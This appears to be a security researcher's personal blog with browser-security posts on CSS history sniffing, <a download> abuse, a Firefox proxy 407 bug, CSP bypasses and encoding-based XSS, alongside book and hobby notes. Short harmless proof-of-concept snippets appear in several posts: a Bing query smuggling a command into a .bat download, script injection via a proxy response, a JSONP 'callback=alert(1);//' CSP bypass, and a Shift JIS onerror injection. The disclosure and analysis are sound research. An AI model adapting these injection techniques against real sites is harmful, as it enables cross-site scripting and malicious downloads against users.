This is a personal blog. My other stuff: book | home page | Twitter | G+ | CNC robotics | electronics

June 22, 2014

Boolean algebra with CSS (when you can only set colors)

Depending on how you look at it, CSS can be considered Turing-complete. But in one privacy-relevant setting - when styling :visited links - the set of CSS directives you can use is extremely limited, effectively letting you control not much more than the color of the text nested between <a href=...> and </a>. Can you perform any computations with that?

Well, as it turns out, you can - in a way. Check out this short write-up for a discussion on how to implement Boolean algebra by exploiting an interesting implementation-level artifact of CSS blending to steal your browsing history a bit more efficiently than before.

Vulnerability logo and vanity domain forthcoming - stay tuned.

March 20, 2014

Messing around with <a download>

Not long ago, the HTML5 specification has extended the semantics for <a href=...> links by adding the download attribute. In a nutshell, the markup allows you to specify that an outgoing link should be always treated as a download, even if the hosting site does not serve the file with Content-Disposition: attachment:

<a href="http://i.imgur.com/b7sajuK.jpg" download>What a cute kitty!</a>

I am unconvinced that this feature scratches any real itch for HTTP links, but it's already supported in Firefox, Chrome, and Opera.

Of course, there are some kinks: in absence of the Content-Disposition header, the browser needs to figure out the correct file name for the download. In practice, this is always done based on the path seen in the URL. That's not great, because a good majority of web frameworks will tolerate trailing garbage in the path segment; indeed, so does imgur.com. Let's try it out:

<a href="http://i.imgur.com/b7sajuK.jpg/KittyViewer.exe" download>What a cute kitty!</a>

But we shouldn't dwell on this, because the download syntax makes it easy for the originating page to simply override that logic and pick any file name and extension it likes:

<a href="http://i.imgur.com/b7sajuK.jpg" download="KittyViewer.exe">What a cute kitty!</a>

That's odd - and keep in mind that the image we are seeing is at least partly user-controlled. A location like this can be found on any major destination on the Internet: if not an image, you can always find a JSON API or a HTML page that echoes something back.

It also helps to remember that it's usually pretty trivial to build files that are semantically valid to more than one parser, and have a different meaning to each one of them. Let's put it all together for a trivial PoC:

<a href="http://api.bing.com/qsonhs.aspx?q=%22%26notepad%26"
  download="AltavistaToolbar.bat">Download Bing toolbar from bing.com</a>

That's pretty creepy: if you download the file on Windows and click "open", the payload will execute and invoke notepad.exe. Still, is it a security bug? Well... the answer to that is not very clear.

For one, there is a temptation to trust the tooltip you see when you hover over a download link. But if you do that, you are in serious trouble, even in absence of that whole download bit: JavaScript code can intercept the onclick event and take you somewhere else. Luckily, most browsers provide you with a real security indicator later on: the download UI in Internet Explorer, Firefox, and Safari prominently shows the origin from which the document is being retrieved. And that's where the problem becomes fairly evident: bing.com never really meant to serve you with an attacker-controlled AltavistaToolbar.bat, but the browser says otherwise.

The story gets even more complicated when you consider that some browsers don't show the origin of the download in the UI at all; this is the case for Chrome and Opera. In such a design, you simply have to put all your faith in the origin from which you initiated the download. In principle, it's not a completely unreasonable notion, although I am not sure it aligns with user expectations particularly well. Sadly, there are other idiosyncrasies of the browser environment that mean the download you are seeing on a trusted page might have been initiated from another, unrelated document. Oops.

So, yes, browsers are messy. Over the past few years, I have repeatedly argued against <a download> on the standards mailing lists (most recently in 2013), simply because I think that nothing good comes out of suddenly taking the control over how documents are interpreted by the browser away from the hosting site. I don't think that my arguments were particularly persuasive, in part because nobody seemed to have a clear vision for the overall trust model around downloads on the Web.

PS. Interestingly, Firefox decided against the added exposure and implemented the semantics in a constrained way: the download attribute is honored only if the final download location is same-origin with the referring URL.

November 12, 2013

american fuzzy lop

Well, it's been a while, but I'm happy to announce a new fuzzing tool, aptly named american fuzzy lop: In essence, it's a practical (!) fuzzer for binary data formats that achieves great coverage and automatically synthesizes unique and interesting test cases based on a much smaller set of input files.

For an example of a bug found with afl, check out this advisory. Peace out.

May 04, 2013

And on a completely unrelated note...

...I think it's hilarious to mix several completely unrelated interests that appeal to very disjoint audiences on a single blog, so here is another article that I have recently written for MAKE: "Resin Casting: Going from CAD to Engineering-Grade Parts".

In my earlier article written for their blog, I expressed an opinion that some of the most pervasive barriers to home manufacturing do not lie with the availability of cutting-edge tools - but rather, with a very limited awareness of the well-established design and manufacturing processes that lead to durable, aesthetic, and functional parts.

The new article sheds some light on one of the best ways to progress from CNC-machined or 3D-printed shapes to components that match or outperform high-end injection-molded prototypes. In the extremely unlikely case that this is of any interest to you - enjoy!

Some harmless, old-fashioned fun with CSS

Several years ago, the CSS :visited pseudo-selector caused a bit of a ruckus: a malicious web page could display a large set of links to assorted destinations on the Internet, and then peek at how they were rendered to get a snapshot of your browsing history.

Several browser vendors addressed this problem by severely constraining the styling available from within the :visited selector, essentially letting you specify text color and not much more. They also limited the visibility of the styled attributes through APIs such as window.getComputedStyle(). This fix still permitted your browsing history to be examined through mechanisms such as cache timing or the detection of 40x responses for authentication-requiring scripts and images from a variety of websites. Nevertheless, it significantly limited the scale of the probing you could perform in a reliable and non-disruptive way.

Of course, many researchers have pointed out the obvious: that if you can convince the user to interact with your website, you can probably tell what color he is seeing without asking directly. A couple of extremely low-throughput attacks along these lines have been demonstrated in the past - for example, the CAPTCHA trick proposed by Collin Jackson.

So, my belated entry for this contest is this JavaScript clone of "Asteroids". It has a couple of interesting properties:
  • It's not particularly outlandish or constrained - at least compared to the earlier PoCs with CAPTCHAs or chess boards.

  • It collects information without breaking immersion. This is done by alternating between "real" and "probe" asteroids. The real ones are always visible and are targeted at the spaceship; if you don't take them down, the game ends. The "probe" asteroids, which may or may not be visible to the user depending on browsing history, seem as if they are headed for the spaceship, too - but if not intercepted, they miss it by a whisker.

  • It is remarkably high-bandwidth. Although the PoC tests only a handful of sites, it's possible to test hundreds of URLs in parallel by generating a very high number of "probe" asteroids at once. A typical user visits only a relatively small and uniformly distributed number of websites from any sufficiently large data set, so only a tiny fraction of probes would be visible on the screen. In fact, the testing could be easily rate-limited based on how frantic user's mouse movements have been in the past second or so.

  • It's pretty reliable due to the built-in "corrective mechanisms" for poor players.

February 20, 2013

Firefox: HTTPS and response code 407

Today's release of Firefox 19.0 fixes an interesting bug that I reported to the vendor back in October 2012. In essence, an attacker on an untrusted network could first coerce the browser to use a rogue HTTP proxy (this can be done by leveraging the WPAD protocol); wait until the browser attempts to download a HTTPS document from an interesting site through said proxy; and then selectively respond to the appropriate CONNECT request with a plain-text message such as this: HTTP/1.0 407 Boink Proxy-Authenticate: basic Connection: close Content-Type: text/html <html> <h1>Hi, mom!</h1> <script>alert(location.href)</script> [...additional padding follows...] The browser would show the user a cryptic authentication prompt - but hitting ESC or pressing cancel would inevitably result in the proxy-supplied plain-text document being rendered in the same-origin context of the requested HTTPS site. There goes the transport security - so I guess that's an oops?:-)

February 14, 2013

Boring non-security updates strike again!

My next book is coming out probably by the end of the year, and the remaining three readers should not be expecting frequent updates to this blog until then :-) Nevertheless, here are several tidbits not related to security in any way: If this sort of stuff floats your boat, you may also want to follow me on G+. In a couple of weeks, I should have several interesting browser bugs to share. Until then, carry on!

November 16, 2012

Lessons in history

Good news - I'm working on another book!

In the meantime, here's an interesting and forgotten page from the history of JavaScript that I stumbled upon thanks to Tavis. It's a long read, edited a bit for clarity; it's also fascinating account of how close we came to replacing the same-origin policy - its faults notwithstanding - with something much worse than that:

"The security model adopted by Navigator 2.0 and 3.0 is functional, but suffers from a number of problems. The [same-origin policy] that prevents one script from reading the contents of a window from another server is a particularly draconian example. This [policy] means that I cannot write a [web-based debugger] and post it on my web site for other developers to use [in] their own JavaScript. [Similarly, it] prevents the creation of JavaScript programs that crawl the Web, recursively following links from a given starting page."

"Because of the problems with [the same-origin policy], and with the theoretical underpinnings of [this class of security mechanisms], the developers at Netscape have created an entirely new security model. This new model is experimental in Navigator 3.0, and may be enabled by the end user through a procedure outlined later in this section. The new security model is theoretically much stronger, and should be a big advance for JavaScript security if it is enabled by default in Navigator 4.0."

"[Let's consider] the security problem we are worried about in the first place. For the most part, the problem is that private data may be sent across the Web by malicious JavaScript programs. The [SOP approach] patches this problem by preventing JavaScript programs from accessing private data. Unfortunately, this approach rules out non-malicious JavaScript [code that wants to use this data] without exporting it."

"Instead of preventing scripts from reading private data, a better approach would be to prevent them from exporting it, since this is what we are trying to [achieve] in the first place. If we could do this, then we could lift most of the [restrictions] that were detailed in the sections above."

"This is where the concept of data tainting comes in. The idea is that all JavaScript data values are given a flag. This flag indicates if the value is "tainted" (private) or not. [Tainted values will be prevented] from being exported to a server that does not already "own" it. [...] Whenever an attempt to export data violates the tainting rules, the user will be prompted with a dialog box asking them whether the export should be allowed. If they so choose, they can allow the export."

Of course, tainting would not have prevented malicious JavaScript from relaying the observations about the tainted data to parties unknown.

June 08, 2012

This page is now certified

Oh, you're welcome.

(Yeah, I made these.)

May 30, 2012

Yes, you can have fun with downloads

It is an important and little-known property of web browsers that one document can always navigate other, non-same-origin windows to arbitrary URLs; in more limited circumstances, even individual frames can be targeted. I discuss the consequences of this behavior in The Tangled Web - and several months ago, I shared this amusing proof-of-concept illustrating the perils of this logic: Today, I wanted to showcase a more sneaky consequence of this design - and depending on who you ask, one that is possibly easier to prevent.

What's the issue, then? Well, it's pretty funny: predictably but not very intuitively, the attacker may initiate such cross-domain navigation not only to point the targeted window to a well-formed HTML document - but also to a resource served with the Content-Disposition: attachment header. In this scenario, the address bar of the targeted window will not be updated at all - but a rogue download prompt will appear on the screen, attached to the targeted document.

Here's an example of how this looks in Chrome; the fake flash11_updater.exe download supposedly served from adobe.com is, in reality, supplied by the attacker:

All the top three browsers are currently vulnerable to this attack; some provide weak cues about the origin of the download, but in all cases, the prompt is attached to the wrong window - and the indicators seem completely inadequate.

You can check out the demo here:

The problem also poses an interesting challenge to sites that frame gadgets, games, or advertisements from third-party sources; even HTML5 sandboxed frames permit the initiation of rogue downloads (oops!).

Vendor responses, for the sake of posterity:

  • Chrome: reported March 30 (bug 121259). Fix planned, but no specific date set.

  • Internet Explorer: reported April 1 (case 12372gd). The vendor will not address the issue with a security patch for any current version of MSIE.

  • Firefox: reported March 30 (bug 741050). No commitment to fix at this point.
I think these responses are fine, given the sorry state of browser UI security in general; although in good conscience, I can't dismiss the problem as completely insignificant.

April 09, 2012

Well, I'm in a bit of a pickle...

I can't yet publish an interesting bug I hoped to share; I also don't want to rehash my earlier points about vulnerability trade, even as the debate has flared up again, thanks to the unfashionably late attention from Forbes and EFF.

So what I wanted to do instead is, once again, annoy the few remaining readers with my hobbyist work. Specifically, I wanted to showcase three things:

  • Omnibot, an interesting robot with a reconfigurable drivetrain,
  • Cycloidal drive, a mini-project to make an unorthodox type of transmission,
  • Adventures in CNC, my semi-humorous summary of my experiences with home manufacturing.
Sorry about that, and may the fortune be with you from now on!

February 12, 2012

It's this time of the year again

Yeah, welcome to the 2012 edition of the full disclosure debate!

As usual, there are reasonable people who disagree about the merits of non-coordinated disclosure; a more recent trend is to debate the value of developing and publishing exploits, even for already patched bugs. The short-term risks are pretty clear to any sensible person: there is robust data to show that the availability of functioning exploits drives a good chunk of low-tier, large-scale attacks.

The long-term benefits are more speculative. I like to think of it as a necessary evil: non-disclosure does not prevent sophisticated and resourceful attackers from developing their own exploits and going after high-value targets, but it quickly leads to complacency when it comes to fixing the underlying problems and monitoring your infrastructure. We would not have Windows Update, silent autoupdates in Chrome, or MacOS X ASLR improvements weren't it for the constant stream of public exploits and the accompanying attacks.

The cost-benefit calculation here is mostly a matter of personal taste, and we won't be able to settle it any time soon. I'm a bit on the fence, too: I am at best ambivalent about the merits of exploit packs and frameworks such as CORE Impact or Metasploit. I am also deeply uncomfortable with exploit trading, a trend all-too-eagerly embraced and supported by the industry.

But the merits of the debate aside, there is a disturbing propensity for parties who struggled with security response, and have sometimes adopted openly hostile tactics to suppress security research, to be on the front lines of the anti-disclosure movement. This is why I couldn't help but find parallels between Brad Arkin's recent statements, and a position taken ten years ago by Scott Culp. Brad says:

"My goal isn't to find and fix every security bug. I'd like to drive up the cost of writing exploits. But when researchers go public with techniques and tools to defeat mitigations, they lower that cost. [...] Too much attention is being paid these days to responding to vulnerability reports instead of focusing on blocking live exploits."

"[We need to] work closer with the research community to curb the publication of information that can help malicious hackers. [...] Something hard becomes very very easy. These exploits and techniques are copied, adapted and modified very cheaply."

We all agree that bug-free products are not a realistic goal, but reducing the availability of information is probably also an ill-advised one. If it's still possible to write an exploit, and just "expensive" to do so - for example, because the knowledge on how to bypass ASLR is not common - then indeed, unskilled attackers will be less likely to go after your mom's credit card information; but going after her bank will be a fair game.

As for unintended consequences: in this scenario, the bank no longer has to deal with a steady stream of nuisance malware, so they probably care less about patching and monitoring, and the attacker is more likely to succeed.

Sure, one shouldn't be running on a vulnerability response treadmill. We can escape it to some extent simply by making the process more agile and lightweight. It is also very important to reduce the likelihood of malicious exploitation, but we should do so by tweaking factors other than the "cost" of acquiring domain-specific knowledge. We should embrace proactive approaches such as sensible coding practices, developer education, fuzzing, or tools such as ASLR, JIT randomization, and sandboxing - and when something slips through the cracks, we need to be thankful for the data point and simply make our solution more robust. Let's not obsess about what specific flavor of disclosure policies the researchers believe in: they haven't sold it to the highest bidder, and that's already pretty good.

"We have patched hundreds of CVEs over the last year. But, very, very few exploits have been written against those vulnerabilities. Over the past 24 months, we’ve seen about two dozen actual exploits."

That's a frighteningly high number of exploits, by the way.

January 10, 2012

p0f is back!

I decided to spend some time rewriting and greatly improving my ancient but strangely popular passive fingerprinting tool: Version 3 is a complete rewrite, bringing you much improved SYN and SYN+ACK fingerprinting capabilities, auto-calibrated uptime measurements, completely redone databases and signatures, new API design, IPv6 support (who knows, maybe it even works?), stateful traffic inspection with thorough cross-correlation of collected data, application-level fingerprinting modules (for HTTP now, more to come), and a lot more.

December 19, 2011

Notes about the post-XSS world

Content Security Policy is gaining steam, and we've seen a flurry of other complementary approaches that share a common goal: to minimize the impact of markup injection vulnerabilities by preventing the attacker from executing unauthorized JavaScript. We are so accustomed to thinking about markup injection in terms of cross-site scripting that we don't question this approach - but perhaps we should?

This collection of notes is a very crude thought experiment in imagining the attack opportunities in a post-XSS world. The startling realization I had by the end of that half-baked effort is that the landscape would not change that much: The hypothetical universal deployment of CSP places some additional constraints on what you can do, but the differences are not as substantial as you may suspect. In that sense, the frameworks are conceptually similar to DEP, stack canaries, or ASLR: They make your life harder, but reliably prevent exploitation far less frequently than we would have thought.

Credit where credit is due: The idea for writing down some of the possible attack scenarios comes from Mario Heiderich and Elie Bursztein, who are aiming to write a more coherent and nuanced academic paper on this topic, complete with vectors of their design, and some very interesting 0-day bugs; I hope to be able to contribute to that work. In the meantime, though, it seems that everybody else is thinking out loud about the same problems - including Devdatta Akhawe and Collin Jackson - so I thought that sharing the current notes may be useful, even if the observations are not particularly groundbreaking.

December 10, 2011

X-Frame-Options, or solving the wrong problem

On modern computers, JavaScript allows you to exploit the limits of human perception: you can open, reposition, and close browser windows, or load and navigate away from specific HTML documents, without giving the user any chance to register this event, let alone react consciously.

I have discussed some aspects of this problem in the past: my recent entry showcased an exploit that flips between two unrelated websites so quickly that you can't see it happening; and my earlier geolocation hack leveraged the delay between visual stimulus and premeditated response to attack browser security UIs.

A broader treatment of these problems - something that I consider to be one of the great unsolved problems in browser engineering - is given in "The Tangled Web". But today, I wanted to showcase another crude proof-of-concept illustrating why our response to clickjacking - and the treatment of it as a very narrow challenge specific to mouse clicks and <iframe> tags - is somewhat short-sighted. So, without further ado:

There are more complicated but comprehensive approaches that may make it possible for web applications to ensure that they are given a certain amount of non-disrupted, meaningful screen time; but they are unpopular with browser vendors, and unlikely to fly any time soon.

December 08, 2011

The old switcharoo

Another tiny proof-of-concept for the day: While the idea is fairly trivial, it seems pretty frightening to me - and neatly illustrates one of the points I'm making in The Tangled Web. I highly doubt that even the most proficient and attentive users would be able to spot this happening in the wild.

(If you don't get it, try again, and follow instructions on the screen.)

Interesting results can be also achieved in some browsers with history.back(), but I'll leave this as an exercise for readers. The same goes for the implications it has for clickjacking, drag-and-drop, and other attacks normally associated with frames.

PS. Another silly proof-of-concept as a bonus: click here.

December 02, 2011

CSS :visited may be a bit overrated

OK, second time is a charm. This script is probably of some peripheral interest: In the past two years or so, a majority of browser vendors decided to take a drastic step of severely crippling CSS :visited selectors in order to prevent websites from stealing your browsing history.

It is widely believed that techniques such as cache timing may theoretically offer comparable insights, but the attacks demonstrated so far seemed unconvincing. Among other faults, they relied on destructive, one-shot testing that altered the state of the examined cache; produced only probabilistic results; and were far too slow and noisy to be practically useful. Consequently, no serious attempts to address the underlying weakness have been made.

My proof of concept is fairly crude, and will fail for a minority of readers; but in my testing, it offers reliable, high-performance, non-destructive cache inspection that blurs the boundary between :visited and all the "less interesting" techniques.

November 15, 2011

"The Tangled Web" is out

Okay, okay, it's official. You can now buy The Tangled Web from Amazon, Barnes & Noble, and all the other usual retailers for around $30. You can also order directly from the publisher, in which case, discount code 939758568 gets you 30% off.

No Starch provides a complimentary, DRM-free PDF, Mobi, and ePub bundle with every paper copy; you can also buy e-book edition separately. Kindle and other third-party formats should be available very soon.

More info about the book itself, including a sample chapter, can be found on this page.

November 04, 2011

In praise of anarchy: metrics are holding you back

It is a comforting to think about information security as a form of computer science - but the reality of securing complex enterprises is as unscientific as it gets. We can theoretize how to write perfectly secure software, but no large organization will ever be in a meaningful vicinity of that goal. We can also try to objectively measure our performance, and the resilience of our defenses - but by doing so, we casually stroll into a trap.

Why? I think there are two qualities that make all the difference in our line of work. One of them is adaptability - the capacity to identify and respond to new business circumstances and incremental risks that appear every day. The other is agility - the ability to make changes really fast. Despite its hypnotic allure, perfection is not a practical trait; in fact, I'm tempted to say that it is not that desirable to begin with.

Almost every framework for constructing security metrics is centered around that last pursuit - perfection. It may not seem that way, but it's usually the bottom line: the whole idea is to entice security teams to define more or less static benchmarks of their performance. From that follows the focus on continually improving the readings in order to demonstrate progress.

Many frameworks also promise to advance one's adaptability and agility, but that outcome is very seldom true. These two attributes depend entirely on having bright, inquisitive security engineers thriving in a healthy corporate culture. A dysfunctional organization, or a security team with no technical insight, will find false comfort in a checklist and a set of indicators - but will not be able to competently respond to the threats they need to worry about the most.

A healthy team is no better off: they risk being lulled into complacency by linking their apparent performance to the result of a recurring numerical measurement. It's not that taking measurements is a bad idea; in fact it's an indispensable tool of our trade. But using metrics as long-term performance indicators is a very dangerous path: they do not really tell you how secure you are, because we have absolutely no clue how to compute that. Instead, by focusing on hundreds of trivial and often irrelevant data points, they take your eyes off the new and the unknown.

And this brings me to the other concern: the existence of predefined benchmarks impairs flexibility. Quite simply, yesterday's approach, enshrined in quarterly statistics and hundreds of pages of policy docs, will always overstay it welcome. It's not that the security landscape is constantly undergoing dramatic shifts; but if you don't observe the environment and adjust your course and goals daily, the errors do accumulate... until there is no going back.

October 28, 2011

Good news, everyone!

No Starch Press just posted a sample chapter for The Tangled Web. You can grab the PDF here and see what it's all about. The book itself should be available by November 15; you can also preorder on Amazon.

If you don't know what this is all about, you can also head over to the home page of the book; but the bottom line is that I think it's the first-ever reasonably detailed examination of the browser security model and its evolution through the years - and really, that's something you just need to know to develop modern web apps.

PS. It's apparently always April Fools' at Microsoft!

October 02, 2011

An origin is forever

This post is inspired chiefly by the work of Artur Janc.

The Internet is a pretty seedy place, yet we are quite willing to hand over our secrets to a small group or trusted web apps. Heck, in recent years, we also started giving them capabilities: social networking sites often get to see your geolocation, and your instant messenger may be able to access your microphone or webcam feeds. Some of this does not even require your initial consent: certain browsers and plugins come with hardcoded domains that are permitted to install software updates, or change system settings at a whim.

The push toward web application capabilities is somewhat frightening once you realize that the boundaries between web applications are very poorly defined, and that nobody is trying to solve that uncomfortable problem first. Look at the scoping rules for JavaScript DOM access, for HTTP cookies, and for auxiliary mechanisms such as password managers: they not only differ substantially, but routinely interfere with each other in destructive ways. Compartmentalizing complex web applications should be a breeze, but instead, it's an impenetrable form of art.

Worse, content isolation on the web is very superficial - so even if the boundaries can be drawn, most types of privileged contexts can't distance themselves from the rest of the world, and expose just a handful of well-defined APIs. Instead, every non-trivial web application needs to heavily compensate for the risk of clickjacking, cross-request forgery, reflected cross-site scripting, and dozens of other attacks of that sort. All the developers eventually fail, by the way: show me a domain with no history of XSS, and I will show you a web application nobody cares about.

Unlike some other tough challenges in browser engineering, the risks of living with privileged applications could mitigated fairly nicely simply by requiring some effort up front: even without inventing any new security mechanisms, you could require applications to use origin cookies, have a sensible CSP policy, and use HSTS, before being allowed to prompt for extra privileges. It's not impossible to do something meaningful - it's just unpopular with the creators of privileged APIs.

But the problems with the clarity of robustness of application boundaries aside, there is also a third, perhaps more fascinating issue: what do you do if your web application execution context becomes corrupted in some way? As it turns out, there is no mechanism for the server to say that from now on, it wants to have a clean slate, and that the browser should drop or at least isolate any already running code, or previously stored data.

This seemingly odd wish is actually critical to web application security. For example, let's assume there is an XSS vulnerability in a web mail system or a social networking application. Because of the convenient but unfortunate design of HTML, such vulnerabilities are unavoidable, but we seldom wonder if it's possible to cleanly and predictably recover from them. Intuitively, patching the underlying bug, invalidating session cookies, and perhaps forcing password change, is all it should take; in fact, applications using httponly cookies can often skip the last two steps.

Alas, an once-compromised web origin can stay tainted indefinitely. At the very minimum, the attacker is in full control for as long as the user keeps the once-affected website open in any browser window; with the advent of portable computers, it is not uncommon for users to keep a single commonly used website open for weeks. During that period, there is nothing the legitimate owner of the site can do - and in fact, there is no robust way to gauge if the infection is still going on. And hey, it gets better: if content from the compromised origin is commonly embedded on third-party pages (think syndicated "like" buttons or advertisements), with some luck, attacker's JavaScript may become practically invincible, surviving closing the original application and the deletion of browser cache. If that doesn't give you a pause, it should.

And let's not forget open wireless networks: the problem there is about as bad. It does not matter that you are not logged into anything sensitive while visiting Starbucks. An invisible frame, a strategic write to localStorage, or a bit of DNS or cache poisoning, is all it takes for the attacker to automatically elevate his privileges the moment you return to a safe environment and log back in.

With all that, and with the proliferation of mechanisms such as web workers and offline apps, we are rapidly approaching a point where recovering from a trivial XSS bug and other common web security lapses is getting almost as punishing as recovering from RCE - and for no good reason, too. Sure: today, it's so easy to phish users or exploit real RCE bugs, that backdooring web origins is not worth the effort. But in a not-too-distant future, that balance may shift.

September 09, 2011

Critical (of) severity

You can tell when a person is desperate to appear authoritative: they often litter their speech with unnecessary, roundabout verbiage. To some listeners, this sounds smart. To many others, it's obtuse and pompous.

I think that one of the cornerstones of vulnerability management is just an example of that. I am talking about the concept of vulnerability severities: I believe that they serve no real purpose, other than obfuscating the true intent of speech.

It's not that we don't need a codified taxonomy; but the term "severity" and the abstract levels attached to it ("critical", "high", "medium", "low") are a remarkably poor proxy for what we actually want to say.

The notion of severity is used in two distinct settings:

  • In a position of authority: For example, when an internal security team is communicating with developers. In this case, the intent of assigning severity is to instruct the developer to do one of the following:

    • Drop all other work and fix the bug now.
    • Fix the issue in a couple of days.
    • Fix at own leisure, or not at all.

  • In an advisory position: Say, when a vendor is notifying end users about the availability of a fix. In this case, the actual message usually is any of the following:

    • You are in imminent danger. Patch now.
    • You are at a limited risk, but prompt action is advisable.
    • We don't think there is a substantial risk.
Every time, the messages are very simple. Yet, instead of just saying it out loud, we create one set of guidelines for the security team to map their assessment to an ambiguous codeword; and then furnish a second lengthy phrasebook for the final recipient of a message, to map the codeword to something they can act on.

Only we're not running a numbers station: we're trying to tell people something very important, and we need them to understand us right away. There is no way around the fact that terms such as "critical" or "high" intuitively mean different things to different people, and almost certainly not just the thing you actually wanted to say. If the severity needs to be accompanied with several pages of organization-specific explanatory text, something is horribly wrong.

Instead of "highly critical", just start telling your users "patch right away".

August 29, 2011

So you want to write a security book?

Now that I am done with my side project, I wanted to post a note about something that my colleagues frequently ask about: the reality of publishing a security-themed book.

The most important advice I can give is to start with a reality check: writing for technical audiences will probably not make you rich. You will invest somewhere between 200 and 1,000 hours of work over the course of several months. In the next two years, you will likely sell from 1,000 to 50,000 copies (10,000 is pretty good already). Your cut is between $2 and $5 per copy (that's 10-20% of the actual sale price, which in turn is usually around 50% of the cover price); proportionally less if there are multiple authors involved.

The bottom line is that your motivation needs to be something other than money. If there are no quality, up-to-date reference materials in your field of expertise, or if you just have something interesting to share, go for it. If you just want to earn some cash, random consulting gigs would net you more.

If you are still serious about the plan, the next step is choosing between a traditional publisher, and doing all the work yourself. I recommend the former. There are some reputable self-published security books (say, Fyodor's), and if you pursue this route, you will be able to get a slightly larger slice of the revenue pie. That said, you lose some important benefits:

  • You will not get professional editorial feedback. Having an independent sanity check from a person who publishes books for a living helps you set the style and flow of the chapters, and arrange them reasonably. This is harder than it seems. Even the best ideas look bad when presented poorly.

  • You will have to take care of technical illustrations, page layout, indexes, and so on - requiring some talent, and easily adding 50-100 hours of work into the mix.

  • You will have to pay for technical editing and proofreading - or ship the book with typos and grammar errors, which never helps.

  • You will have to invest some effort into marketing, accounting, etc.
If you have a decent proposal, you can approach publishers out of the blue, and pick the one you want to work with; for time being, the demand for infosec authors seems to be higher than the supply. All the publishers will all offer you roughly the same financial terms, but there are some interesting differences in what you will get in return. I know quite a few authors signed up with one of the major publishing houses, and very unhappy about not receiving any editorial attention past the first chapter or two; or not being able to get an illustrator assigned to the project, and having to do the work themselves. In these cases, one has to wonder what the publisher is doing to earn its fees.

So, ask around. For example, in comparison to said publisher, my experiences with No Starch Press have been very good.

August 26, 2011

The subtle / deadly problem with CSP

Content Security Policy is a promising new security mechanism deployed in Firefox, and on its way to WebKit. It aims to be many things - but its most important aspect is the ability to restrict the permissible sources of JavaScript code in the policed HTML document. In this capacity, CSP is hoped to greatly mitigate the impact of cross-site scripting flaws: the attacker will need to find not only a markup injection vulnerability, but also gain the ability to host a snippet of malicious JavaScript in one of of the whitelisted locations. Intuitively, that second part is a much more difficult task.

Content Security Policy is sometimes criticized on the grounds of its complexity, potential performance impact, or its somewhat ill-specified scope - but I suspect that its most significant weakness lies elsewhere. The key issue is that the granularity of CSP is limited to SOP origins: that is, you can permit scripts from http://www1.mysite.com:1234/, or perhaps from a wildcard such as *.mysite.com - but you can't be any more precise. I am fairly certain that in a majority of real-world cases, this will undo many of the apparent benefits of the scheme.

To understand the problem, it is important to note that in modern times, almost every single domain (be it mozilla.org or microsoft.com) hosts dozens of largely separate web applications consisting of hundreds of unrelated scripts - quite often including normally inactive components used for testing and debugging needs. In this setting, CSP will prevent the attacker from directly injecting his own code on the vulnerable page - but will still allow him to put the targeted web application in a dangerously inconsistent state, simply by loading select existing scripts in the incorrect context or in an unusual sequence. The history of vulnerabilities in non-web software strongly implies that program state corruption flaws will be exploitable more often than we may be inclined to suspect.

If that possibility is unconvincing, consider another risk: the attacker loading a subresource that is not a genuine script, but could be plausibly mistaken for one. Examples of this include an user-supplied text file, an image with a particular plain-text string inside, or even a seemingly benign XHTML document (thanks to E4X). The authors of CSP eventually noticed this unexpected weakness, and decided to plug the hole by requiring a whitelisted Content-Type for any CSP-controlled scripts - but even this approach may be insufficient. That's because of the exceedingly common practice of offering publicly-reachable JSONP interfaces for which the caller has the ability to specify the name of the callback function, e.g.:

GET /store_locator_api.cgi?zip=90210&callback=myResultParser HTTP/1.0
...

HTTP/1.0 200 OK
Content-Type: application/x-javascript
...
myResultParser({ "store_name": "Spacely Space Sprockets",
                 "street": ... });
Having such an API anywhere within a CSP-permitted origin is a sudden risk, and may be trivially leveraged by the attacker to call arbitrary functions in the code (perhaps with attacker-dependent parameters, too). Worse yet, if the callback string is not constrained to alphanumerics – after all, until now, there was no compelling reason to do so – specifying callback=alert(1);// will simply bypass CSP right away.

The bottom line is that CSP will require web masters not only to create a sensible policy, but also thoroughly comb every inch of the whitelisted domains for a number of highly counterintuitive but potentially deadly irregularities like this. And that's the tragedy of origin scoping: if people were good at reviewing their sites for subtle issues, we would not be needing XSS defenses to begin with.

April 09, 2011

Using View > Encoding can kill you (in a manner of speaking)

Here's an interesting tidbit: you should never use the View > Encoding menu in any browser unless you fully trust the visited website.

Picking an alternative encoding through that menu overrides the character set not only for the top-level document, but also for all the nested frames - even if they happen to be cross-domain or hidden from view. And that may very well enable the owner of the visited page to carry out an XSS attack against a random third-party application without your knowledge.

Most security researchers associate encoding-related XSS problems with UTF-7, a somewhat preposterous and unnecessary encoding scheme that, by design, allows overlong encoding of 7-bit ASCII values (with disastrous consequences for HTML parsing). Not all browsers support UTF-7, and users are not likely to make that choice in the aforementioned menu. So, we're fine, right?

Well, not exactly. Many other, still popular multi-byte encodings, including Shift JIS or EUC-*, are also fairly problematic: their parsers often suffer from character consumption bugs, and in contrast to UTF-8, relatively little attention has been given to cleaning this up.

For example, with forced Shift JIS, this input is likely to be exploitable:

<img src="http://fuzzybunnies.com/[0xE0]">
  ...this is still a part of the markup...
  " onerror="alert('Hi mom!')" x="
  ...
Simple demo here.

March 12, 2011

Pwn2own considered (somewhat) harmful

I think that hacking challenges and bug bounty programs can be extremely valuable. This is true when they involve transparent, sustained efforts to evaluate the security of a particular platform. For example, I believe that there is a substantial value in Mozilla bug bounties, or in the Chrome reward program. These programs greatly improve the security of the browsers in question, occasionally advance our understanding of web security, and provide tons of statistical data about vendor response processes and attitudes toward security flaws. That last part is arguably the most important metric when dealing with code so complex that for better or worse, it is unlikely to ever be perfectly safe.

I also think that Pwn2own, an annual browser hacking contest run by TippingPoint, does not deliver the same value. The formula of the contest boils down to this: once a year, a single, secretly developed exploit is exchanged for a substantial amount of money. No information about the flaw or its back story is revealed in the process, and given that this trade is negligible in comparison to the annual volume of browser vulnerabilities, there is absolutely no intrinsic value in observing it.

That, alone, is not a compelling criticism; at best, it's a reason not to watch. But then, there are some negative consequences, too: it is in the interest of the conference and contest organizers, and the participating researchers, to get publicity for their findings - and journalists, who do not necessarily have a holistic view of the day-to-day browser security research, embrace such high-profile developments with disproportionate enthusiasm. The resulting ecstatic press coverage ultimately undermines any attempt to have a meaningful and reasonable discussion about the state of browser security.

Take this quote, which likely will be repeated in every Safari-related story for the next twelve months:

"A team was able to exploit Safari to exploit a MacBook Air in five seconds. Yes, five seconds - less time than it takes most people just to type 'Safari got hacked in less than five seconds'."

